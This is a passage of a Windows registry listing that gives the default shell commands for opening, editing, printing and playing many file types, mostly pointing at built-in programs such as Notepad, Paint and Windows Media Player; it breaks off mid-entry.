HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.dib\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.fbx\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.gif\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.gif\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.glb\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jfif\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jfif\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jpe\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jpe\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jpeg\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jpeg\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jpg\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jpg\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.obj\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.ply\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.png\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.png\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.stl\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.tif\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.tif\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.tiff\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.tiff\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.wdp\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\image\shell\edit\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\image\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\text\shell\edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\text\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\telnet\shell\open\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\url.dll",TelnetProtocolHandler %l HKEY_LOCAL_MACHINE\SOFTWARE\Classes\textfile\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\textfile\shell\print\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\textfile\shell\printto\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\themefile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\themepackfile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TIFImage.Document\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TIFImage.Document\shell\printto\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\shimgvw.dll",ImageView_PrintTo /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\tn3270\shell\open\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\url.dll",TelnetProtocolHandler %l HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ttcfile\shell\preview\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ttcfile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ttffile\shell\preview\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ttffile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\printto\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\notepad.exe /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Undecided\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\OpenWith.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\shell\Open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\OpenWith.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\shell\openas\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\OpenWith.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\shell\OpenWithSetDefaultOn\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\OpenWith.exe -override "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBEFile\Shell\Edit\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\Notepad.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBEFile\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\WScript.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBEFile\Shell\Open2\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\CScript.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBEFile\Shell\Print\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\Notepad.exe" /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\Shell\Edit\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\Notepad.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\WScript.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open2\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\CScript.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\Shell\Print\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\Notepad.exe" /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\vcard_wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /vcard "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WAB.AssocProtocol.LDAP\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" "/ldap:%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /Import "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wbcatfile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\sdclt.exe /restorepage HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wcxfile\shell\Open\Command (Default) REG_SZ "C:\Windows\System32\xwizard.exe" RunWizard /u {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z%1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wdpfile\shell\print\command (Default) REG_EXPAND_SZ rundll32.exe %SystemRoot%\system32\shimgvw.dll,ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wdpfile\shell\printto\command (Default) REG_EXPAND_SZ rundll32.exe %SystemRoot%\system32\shimgvw.dll,ImageView_PrintTo /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\webpnpFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\wpnpinst.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.CompositeFont\shell\open\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\notepad.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.IsoFile\shell\burn\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\isoburn.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.IsoFile\shell\mount\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.VhdFile\shell\mount\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.XamlDocument\shell\edit\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\notepad.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.XamlDocument\shell\open\command (Default) REG_SZ "C:\Windows\System32\PresentationHost.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.Xbap\shell\edit\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\notepad.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.Xbap\shell\open\command (Default) REG_SZ "C:\Windows\System32\PresentationHost.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WindowsBackupFolderOptions\shell\openDesktopIni\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\sdclt.exe /FOLDEROPTIONS %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WindowsStore.License\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\licensemanagershellext.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wmffile\shell\open\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wmffile\shell\print\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wmffile\shell\printto\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.AudioCD\Shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:3 /device:AudioCD "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.BurnCD\Shell\Burn\Command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:3 /Task:CDWrite /Device:"%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DVD\Shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:4 /device:DVD "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DVR-MSFile\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.DVR-MSFile\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.VCD\Shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:4 /device:VCD "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.WTVFile\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP.WTVFile\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.3G2\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.3G2\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.3GP\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.3GP\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.ADTS\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.ADTS\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.AIFF\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.AIFF\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.ASF\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:7 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.ASF\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:7 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.ASX\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.ASX\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.AU\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.AU\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.AVI\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:8 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.AVI\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:8 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.CDA\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.CDA\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.FLAC\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.FLAC\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.M2TS\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:12 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.M2TS\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:12 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.m3u\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.m3u\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.M4A\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.M4A\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MIDI\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MIDI\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MK3D\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MK3D\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MKA\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MKA\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MKV\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MKV\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MOV\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MOV\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MP3\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MP3\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MP4\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MP4\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MPEG\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:9 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MPEG\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:9 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.TTS\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:12 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.TTS\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:12 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WAV\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WAV\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WAX\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WAX\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.wma\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:5 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.wma\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:5 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WMD\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /WMPackage:"%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WMS\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /layout:"%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WMV\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:7 /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WMV\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:7 /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WMZ\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /layout:"%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WPL\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WPL\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WVX\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WVX\shell\Play\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocProtocol.DLNA-PLAYSINGLE\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocProtocol.MMS\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wordpad.Document.1\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wordpad.Document.1\shell\print\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wordpad.Document.1\shell\printto\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WPDContextMenu.Url\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\ieframe.dll",OpenURL %l HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WSFFile\Shell\Edit\Command (Default) 